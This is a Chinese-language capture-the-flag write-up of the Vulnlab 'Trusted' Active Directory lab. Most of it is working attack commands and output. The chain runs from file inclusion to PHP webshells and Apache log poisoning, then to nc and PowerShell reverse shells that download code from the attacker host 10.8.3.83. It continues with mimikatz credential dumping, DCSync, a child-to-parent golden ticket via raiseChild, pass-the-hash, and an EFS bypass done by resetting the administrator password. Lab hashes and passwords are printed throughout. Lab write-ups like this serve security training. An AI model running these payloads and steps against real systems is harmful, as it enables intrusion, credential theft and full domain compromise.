nmap scan
sudo nmap -Pn -v -A 10.10.234.117-118 -oA Scan/detail
Nmap scan report for 10.10.234.117
Host is up (0.27s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 14:43:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-09T14:42:11
| Not valid after: 2025-02-08T14:42:11
| MD5: c37d:ef00:b155:3988:caea:d318:994a:0715
|_SHA-1: d43f:a2f1:ca21:44f2:8b6c:c74b:0c70:5b89:edec:f619
|_ssl-date: 2024-08-10T14:46:25+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-10T14:46:08+00:00
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/10%OT=53%CT=1%CU=35210%PV=Y%DS=2%DC=T%G=Y%TM=66B7
OS:7D4B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=106%GCD=2%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M4CANW8ST1
OS:1%O2=M4CANW8ST11%O3=M4CANW8NNT11%O4=M4CANW8ST11%O5=M4CANW8ST11%O6=M4CAST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M4CANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Sat Aug 10 10:41:57 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-08-10T14:46:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 267.79 ms 10.8.0.1
2 267.98 ms 10.10.234.117
Nmap scan report for 10.10.234.118
Host is up (0.27s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.234.118/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 14:43:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.234.118/dashboard/
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, ODBCClient, FoundRows, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 0)yLM|I7ui/LojJnmZY2
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Issuer: commonName=labdc.lab.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-09T14:42:14
| Not valid after: 2025-02-08T14:42:14
| MD5: 0ea5:c90c:7c2a:5921:a4ca:7938:3685:c9b6
|_SHA-1: ba28:6ebf:3391:9f4a:7130:2068:dde5:9ce0:8cf8:6005
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-10T14:46:09+00:00
|_ssl-date: 2024-08-10T14:46:26+00:00; +1s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/10%OT=53%CT=1%CU=41084%PV=Y%DS=2%DC=T%G=Y%TM=66B7
OS:7D4B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=104%GCD=2%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M4CANW8ST1
OS:1%O2=M4CANW8ST11%O3=M4CANW8NNT11%O4=M4CANW8ST11%O5=M4CANW8ST11%O6=M4CAST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M4CANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Sat Aug 10 10:42:00 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-10T14:46:17
|_ start_date: N/A
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 10.10.234.117
2 268.09 ms 10.10.234.118
NSE: Script Post-scanning.
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Initiating NSE at 10:46
Completed NSE at 10:46, 0.00s elapsed
Post-scan script results:
| clock-skew:
| 0s:
| 10.10.234.117
|_ 10.10.234.118
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 213.00 seconds
两台域控靶机。10.10.234.117 为父域,10.10.234.118为子域。中间可能因为靶机重置导致 IP 变换。
hosts
10.10.234.117 trusteddc.trusted.vl trusted.vl
10.10.234.118 labdc.lab.trusted.vl lab.trusted.vl
http
匿名枚举失败。
10.10.234.118 开放了 80 端口。
dirsearch -u http://10.10.234.118
...
[10:54:06] 301 - 342B - /dashboard -> http://10.10.234.118/dashboard/
[10:54:06] 200 - 7KB - /dashboard/
[10:54:06] 200 - 6KB - /dashboard/howto.html
[10:54:07] 200 - 31KB - /dashboard/faq.html
[10:54:07] 200 - 77KB - /dashboard/phpinfo.php
[10:54:08] 301 - 336B - /dev -> http://10.10.234.118/dev/
[10:54:09] 200 - 2KB - /dev/
[10:54:14] 200 - 30KB - /favicon.ico
...
[10:55:12] 200 - 779B - /Webalizer/
[10:55:15] 200 - 771B - /xampp/
发现 dev 目录。
访问 http://10.10.234.118/dev,点击右上角功能点跳转到 http://10.10.234.118/dev/index.html?view=about.html。
存在文件包含,验证成功。
curl http://10.10.234.118/dev/index.html?view=/windows/win.ini | sed -n '/<p>/,/\/p>/p'
其次靶机开放了 phpinfo 页面,查看 allow_url_include = off,不支持远程包含
但是 Windows 特性,这种情况下可以尝试包含 UNC 路径。
curl 'http://10.10.234.118/dev/index.html?view=\\10.8.3.83\share'
webshell
- shell.php
<?php fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[cmd]);?>'); ?>
http://10.10.234.118/dev/index.html?view=\\10.8.3.83\share\shell.php
- system.php
<?php system('$_REQUEST["x"]');
10.10.234.118/dev/index.html?view=\\10.8.3.83\share\system.php&x=whoami
不能包含 UNC path 可能时系统策略设置。
filter
http://10.10.234.118/dev/index.html?view=php://filter/read=convert.base64-encode/resource= C:\xampp\htdocs\dev\index.html
这里多出了空格所以失败
session
查看 phpinfo 中 session.save_path 变量的值
C:\xampp\tmp
http://10.10.234.118/dev/index.html?view=C:\xampp\tmp\sess_oodcv4po02oodvqr65mhheokcv
权限不足,不允许访问
http://10.10.234.118/dev/index.html?view=C:\xampp\tmp\sess_q5u3hs587fjl52i7ngte64t4p7
file_get_contents
Failed to open stream: Invalid argument in
wfuzz
借助字典 FUZZ。
wget https://github.com/carlospolop/Auto_Wordlists/raw/main/wordlists/file_inclusion_windows.txt
wfuzz -c -w ./file_inclusion_windows.txt -u 'http://10.10.234.118/dev/index.html?view=FUZZ' --hw 208 --hs 'Failed|Permission'
.htaccess
fuzz 出 htaccess 文件,原来该文件将 html 后缀当作 php 文件执行。
http://10.10.234.118/dev/index.html?view=.htaccess
AddType application/x-httpd-php .htm .html
log
fuzz 出 xampp log 位置。
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log
curl -vvv -s "10.10.234.118/" -A "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);}elseif (isset(\$_REQUEST['x'])){eval(\$_REQUEST['x']);} ?>"
成功执行命令:
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=whoami
nt authority\system
nc 反弹shell失败:
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=\\10.8.3.83\share\nc.exe%20-e%20cmd.exe%2010.8.3.83%201234
换nishang
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 s
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.8.3.83 -Port 1234'>>s
echo -n 'iex(iwr -useb 10.8.3.83/s)' | iconv -t utf-16le | base64
aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA==
http://10.10.234.118/dev/index.html?view=c:/xampp/apache/logs/access.log&cmd=cmd.exe%20/c%20powershell%20-e%20aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA==
成功获得反弹shell。
alternative way
http://10.10.168.230/dev/index.html?view=php://filter/read=convert.base64-encode/resource=C:\xampp\htdocs\dev\index.html
http://10.10.168.230/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php
解码得到 mysql root 帐户密码。
index.html 中其实有暗示
Eric please take a look at this if you have the time. I tried to implement some php code and set up the database connection but it doesn’t seem to work. Could you fix it please?
mysql webshell
mysql -h10.10.168.230 -uroot -p'SuperSecureMySQLPassw0rd1337.'
写 webshell 文件
SELECT "<?php system($_REQUEST[0]); ?>" into outfile '/xampp/htdocs/shell.php';
curl 'http://10.10.168.230/shell.php?0=whoami'
同样是 system 用户
curl 'http://10.10.168.230/shell.php?0=powershell+-e+aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgADEAMAAuADgALgAzAC4AOAAzAC8AcwApAA=='
mysql databases
未发现的其他路径
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 |
| 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad |
| 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.272 sec)
john --format=raw-md5 -w=/usr/share/wordlists/rockyou.txt mysql.hash
IHateEric2
rsmith
ewalters
cpowers
netexec smb 10.10.168.230 -u users -p IHateEric2 --continue-on-success
获得 rsmith 用户的凭据,该用户对 ewalters 具有 ForceChangePassword 权限,然后可利用 DLL 劫持提权。
预期路径
enum
枚举域用户和域组。
get-aduser -filter * -server trusted.vl
get-adgroup -filter * -server trusted.vl -properties * | select samaccountname,description
查看 AD 用户描述。
get-aduser -filter * -properties * | select samaccountname,description
get-adgroup 'Enterprise Admins' -server trusted.vl -properties *
Mimikatz
dump lsass
python -m http.server 8080 -d /usr/share/windows-resources/mimikatz/x64/
curl.exe -O http://10.8.3.83:8080/mimikatz.exe
.\mimikatz.exe "sekurlsa::logonpasswords" exit
.\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:lab\krbtgt" exit
c7a03c565c68c6fac5f8913fab576ebd
.\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:lab\administrator" exit
75878369ad33f35b7070ca854100bc07
枚举信任关系
PS C:\programdata> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : trusted.vl
ObjectClass : trustedDomain
ObjectGUID : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=lab,DC=trusted,DC=vl
Target : trusted.vl
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
abuse
拿下子域域控,父子域双向新人,可制作黄金票据,冒充企业管理员用户。使用 RaiseChild 自动化完成这个过程。
RaiseChild
impacket-raiseChild "lab.trusted.vl"/"administrator" -hashes :75878369ad33f35b7070ca854100bc07 -debug
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Calling NRPC DsrGetDcNameEx()
[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[+] Calling LSAT hLsarQueryInformationPolicy2()
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=lab,DC=trusted,DC=vl
lab.trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] VALIDATION_INFO before making it gold
....
[+] Getting TGS for SPN cifs/TRUSTEDDC
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[*] Getting credentials for trusted.vl
[+] 10.10.234.117 is TRUSTEDDC.trusted.vl
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=trusted,DC=vl
trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
[*] Target User account name is Administrator
[+] 10.10.234.117 is TRUSTEDDC.trusted.vl
[+] Trying to connect to KDC at LAB.TRUSTED.VL:88
[+] Trying to connect to KDC at TRUSTED.VL:88
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=trusted,DC=vl
trusted.vl/Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
trusted.vl/Administrator:aes256-cts-hmac-sha1-96s:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
得到父域 administrator 用户 hash 值。
evil-winrm
evil-winrm -i trusted.vl -u Administrator -H 15db914be1e6a896e7692f608a9d72ef
netexec smb 10.10.234.117 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef --exec-method smbexec -x 'type C:\users\administrator\desktop\root.txt'
10.10.168.229
evil-winrm -i 10.10.168.229 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef
netexec smb 10.10.168.229 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef -x 'type C:\users\administrator\desktop\root.txt'
但是无法读取 root flag。
secretsdump
impacket-secretsdump administrator@10.10.168.229 -hashes :15db914be1e6a896e7692f608a9d72ef -just-dc-user administrator -just-dc-ntlm
windows
Windows 手动利用流程:
(Get-ADDomain lab.trusted.vl).domainsid.value
S-1-5-21-2241985869-2159962460-1278545866
(Get-ADDomain trusted.vl).domainsid.value
S-1-5-21-3576695518-347000760-3731839591
.\mimikatz.exe "kerberos::golden /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /rc4:c7a03c565c68c6fac5f8913fab576ebd /user:administrator /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt" exit
kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
.\mimikatz.exe "kerberos::ptt \programdata\trust.kirbi" exit
dir \\TRUSTEDDC.trusted.vl\c$
dir \\TRUSTEDDC\c$
invoke-command TRUSTEDDC -scriptblock {whoami}
.\mimikatz.exe "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all" exit
Root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
Access to the path 'C:\Users\Administrator\desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
直接读取 root.txt 提示 Access is denied.
检查 C:\users<username>\appdata\roaming\Microsoft\Protect 路径,存在文件意味着使用了 efs 加密。
dir $env:appdata\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 9/14/2022 9:03 AM S-1-5-21-3576695518-347000760-3731839591-500
CIPHER /u /n
Encrypted File(s) on your system:
C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt
[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")
True
*Evil-WinRM* PS C:\Users\Administrator\desktop> cipher /c root.txt
Listing C:\Users\Administrator\desktop\
New files added to this directory will be encrypted.
E root.txt
Compatibility Level:
Windows Vista/Server 2008
cipher.exe : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied. Key information cannot be retrieved.
Access is denied.
EFS Bypass
EFS (Encrypted File System) 是 Windows 内置的加密功能,允许您加密文件或目录以防止其他用户打开它们。这会生成一个证书,该证书需要存在于当前会话中才能解密并读取加密文件。
内存中需要有密钥
wp 中的解密方式是修改 administrator 用户密码,然后利用 runascs 登录查看
net users administrator "Password!1234"
evil-winrm -i 10.10.168.229 -u administrator -p 'Password!1234'
iex(iwr -useb http://10.8.3.83/Invoke-RunasCs.ps1)
curl.exe -O http://10.8.3.83/RunasCs.exe
Invoke-RunasCs -username administrator -password 'Password!1234' -command cmd.exe -remote 10.8.3.83:1234
.\RunasCs.exe administrator 'Password!1234' cmd -r 10.8.3.83:1234
读取 flag
type C:\Users\Administrator\desktop\root.txt
同时还可以解密
C:\Users\Administrator\Desktop>cipher.exe /d root.txt
cipher.exe /d root.txt
Decrypting files in C:\Users\Administrator\Desktop\
root.txt [OK]
1 file(s) [or directorie(s)] within 1 directorie(s) were decrypted.
File
- C:\xampp\htdocs\dev\db.php
<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";
$conn = mysqli_connect($servername, $username, $password);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
- index.html
<?php
if(!isset($_GET['view']) || ($_GET['view']=="index.html")) {
$content = <<<EOD
...
echo $content;
}
else {
echo"<p>";
include($_GET['view']);
echo "</p>";
}
?>
- C:\users\cpowers\Documents\task.ps1
type C:\users\cpowers\Documents\task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
问题
session 目录下均为空文件
dir C:\xampp\tmp\sess_paggh2grbcm917ie02jassmcnm
UNC 反弹 shell 失败,获得 shell 之后测试由于本地策略导致无法访问 UNC 路径下文件。
cmd /c "\\10.8.3.83\share\nc.exe -e cmd 10.8.3.83 1234"
PS C:\xampp\htdocs\dev> cmd : You can’t access this shared folder because your organization’s security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
WP
Vulnlab — Trusted. Trused, an easy active directory chain… | by ARZ101 | Medium